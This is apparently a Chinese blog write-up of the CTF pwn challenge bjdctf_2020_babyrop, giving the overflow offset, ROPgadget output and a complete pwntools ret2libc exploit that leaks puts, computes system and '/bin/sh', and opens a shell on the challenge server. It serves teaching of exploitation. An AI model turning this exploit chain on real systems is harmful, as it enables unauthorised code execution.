bjdctf_2020_babyrop

本来以为可以使用libcsearcher直接做的,结果我的libcsearcher找不到libc,只好使用buu提供的libc。

溢出发生在vuln函数的buf变量,偏移为0x20。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
> ROPgadget --binary=bjdctf_2020_babyrop --only="pop|ret"
Gadgets information
============================================================
0x000000000040072c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040072e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400730 : pop r14 ; pop r15 ; ret
0x0000000000400732 : pop r15 ; ret
0x000000000040072b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040072f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400590 : pop rbp ; ret
0x0000000000400733 : pop rdi ; ret
0x0000000000400731 : pop rsi ; pop r15 ; ret
0x000000000040072d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004c9 : ret

64位程序传参顺序如下:这里需要用到RDI寄存器

传参方式

EXP如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *

# p = process('./bjdctf_2020_babyrop')
p = remote('node4.buuoj.cn',29070)
elf = ELF('./bjdctf_2020_babyrop')
libc = ELF('./libc-2.23.so')

pop_rdi = 0x400733
main_addr = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

log.info("main_addr is [" + hex(main_addr) + "]")
log.info("puts_plt is [" + hex(puts_plt) + "]")

payload = b'a'*0x20 + b'a'*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

log.info("use rop to get puts address:")

p.sendafter('Pull up your sword and tell me u story!\n',payload)

puts_addr = u64(p.recvline()[:-1].ljust(8,b'\x00'))

log.info("puts_addr is [" + hex(puts_addr) + "]")
log.info("calculate offset address:")

offset = puts_addr - libc.sym['puts']

log.info("get system and binsh address:")

system_addr = offset + libc.sym['system']
binsh_addr = offset + next(libc.search(b'/bin/sh'))

log.info("system addr is [" + hex(system_addr) + "]")
log.info("binsh addr is [" + hex(binsh_addr) + "]")

log.info("turn to sh interactive:")

payload = b'a'*0x20 + b'a'*8 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.sendlineafter('Pull up your sword and tell me u story!\n',payload)

p.interactive()

作者

饼干

发布于

2021-10-11

更新于

2021-10-11

许可协议

评论